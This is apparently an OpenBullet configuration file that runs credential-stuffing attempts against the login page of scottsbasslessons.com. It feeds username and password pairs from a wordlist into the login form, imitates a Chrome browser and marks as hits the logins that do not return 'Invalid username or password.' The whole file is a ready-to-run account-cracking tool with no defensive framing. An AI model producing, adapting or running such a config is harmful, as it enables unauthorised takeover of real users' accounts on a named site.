[SETTINGS]
{
  "Name": "bassguitar",
  "SuggestedBots": 1,
  "LastModified": "2018-07-17T21:17:13.3163836+00:00",
  "AdditionalInfo": "",
  "Author": "v",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST_LOGIN REQUEST POST "https://scottsbasslessons.com/academy-login" AutoRedirect=TRUE 
  CONTENT "loginName=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://scottsbasslessons.com" 
  HEADER "Referer: https://scottsbasslessons.com/academy-login" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Invalid username or password." 
